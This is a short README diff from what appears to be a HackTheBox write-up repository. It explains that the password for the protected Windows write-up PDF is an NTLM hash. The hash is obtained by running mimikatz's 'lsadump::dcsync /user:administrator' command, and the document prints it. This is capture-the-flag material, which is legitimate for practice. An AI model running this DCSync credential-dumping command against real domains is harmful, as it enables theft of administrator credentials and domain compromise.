m3talm3rg3/Hackthebox_Write_Ups/README.md

 The output is the password for the wirte up

+# Windows

+With the use of mimikatz we launch the following command to obtain the hash

+ ./mimikatz.exe "lsadump::dcsync /user:administrator"

+ And in the final part we will use the one that says NTLM

+Credentials:
+  Hash NTLM: f9485863c1e9e05851ab40cbb5ab9dff

+Just copy and paste into the PDF to unlock it !!

 __**I hope you find them useful.
 In case of advice, feel free to contact me.**__